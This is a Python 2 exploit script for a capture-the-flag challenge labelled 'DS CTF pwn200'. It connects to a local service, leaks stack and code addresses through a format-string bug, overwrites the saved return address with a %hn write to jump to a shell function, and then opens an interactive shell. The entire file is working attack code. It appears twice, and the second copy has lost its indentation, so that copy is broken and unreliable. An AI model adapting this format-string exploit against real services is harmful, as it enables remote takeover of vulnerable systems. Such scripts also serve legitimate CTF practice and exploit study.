Bartol0/pwn200expl.py

## pwn200expl.py
#DS CTF pwn200 exploit by Bartol
from socket import *
import time,re,struct,sys

def send_fstring(fstring,sock):
    fullstring='tan'+fstring
    print ' * Sending: '+fullstring.ljust(63,"A")
    sock.send(fullstring.ljust(63,"A"))
    time.sleep(0.2)
    sock.send("9\n")
    for count in range(1,10):
        sock.send('-1111111111')
        time.sleep(0.1)
    sock.send("\n")

def receive(sock):
    msg = ''
    sock.settimeout(0.2)
    try:
        chunk = sock.recv(4096)
        while chunk:
            msg = msg + chunk
            chunk = sock.recv(4096)
    except:
        print "Remote socket timeout.."
    return msg

def interact(sock):
   while 1:
       command = sys.stdin.readline()
       sock.send(command)
       outp = receive(sock)
       print outp

sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('localhost', 7777))

print "Stage1..."

send_fstring('StackLeak-->%4$p<--.TextLeak-->%31$p<--',sock)

outp=receive(sock)

stackleak = re.search('StackLeak-->([0-9A-z]+?)<--', outp).group(1)
textleak = re.search('TextLeak-->([0-9A-z]+?)<--', outp).group(1)

print " * Stack leaked adress is: " + stackleak
print " * .text leaked address is: " + textleak

stackaddr=int(stackleak,16)
textaddr=int(textleak,16)
saved_eip_addr=stackaddr+0x44#stack offset
shell_addr=textaddr+0x69#.text offset

print " * Saved EIP is at: 0x%x" % saved_eip_addr
print " * Shell func is at: 0x%x" % shell_addr

saved_eip_addr_pack=struct.pack("<I",saved_eip_addr)

print "Stage2..."

width=(shell_addr-315) & 0xffff
send_fstring(saved_eip_addr_pack+"%"+str(width)+"p"+"%43$hn",sock)
outp=receive(sock)

print "Entering shell.."
interact(sock)

sock.close()
	#DS CTF pwn200 exploit by Bartol
	from socket import *
	import time,re,struct,sys

	def send_fstring(fstring,sock):
	fullstring='tan'+fstring
	print ' * Sending: '+fullstring.ljust(63,"A")
	sock.send(fullstring.ljust(63,"A"))
	time.sleep(0.2)
	sock.send("9\n")
	for count in range(1,10):
	sock.send('-1111111111')
	time.sleep(0.1)
	sock.send("\n")

	def receive(sock):
	msg = ''
	sock.settimeout(0.2)
	try:
	chunk = sock.recv(4096)
	while chunk:
	msg = msg + chunk
	chunk = sock.recv(4096)
	except:
	print "Remote socket timeout.."
	return msg

	def interact(sock):
	while 1:
	command = sys.stdin.readline()
	sock.send(command)
	outp = receive(sock)
	print outp

	sock = socket(AF_INET, SOCK_STREAM)
	sock.connect(('localhost', 7777))

	print "Stage1..."

	send_fstring('StackLeak-->%4$p<--.TextLeak-->%31$p<--',sock)

	outp=receive(sock)

	stackleak = re.search('StackLeak-->([0-9A-z]+?)<--', outp).group(1)
	textleak = re.search('TextLeak-->([0-9A-z]+?)<--', outp).group(1)

	print " * Stack leaked adress is: " + stackleak
	print " * .text leaked address is: " + textleak

	stackaddr=int(stackleak,16)
	textaddr=int(textleak,16)
	saved_eip_addr=stackaddr+0x44#stack offset
	shell_addr=textaddr+0x69#.text offset

	print " * Saved EIP is at: 0x%x" % saved_eip_addr
	print " * Shell func is at: 0x%x" % shell_addr

	saved_eip_addr_pack=struct.pack("<I",saved_eip_addr)

	print "Stage2..."

	width=(shell_addr-315) & 0xffff
	send_fstring(saved_eip_addr_pack+"%"+str(width)+"p"+"%43$hn",sock)
	outp=receive(sock)

	print "Entering shell.."
	interact(sock)

	sock.close()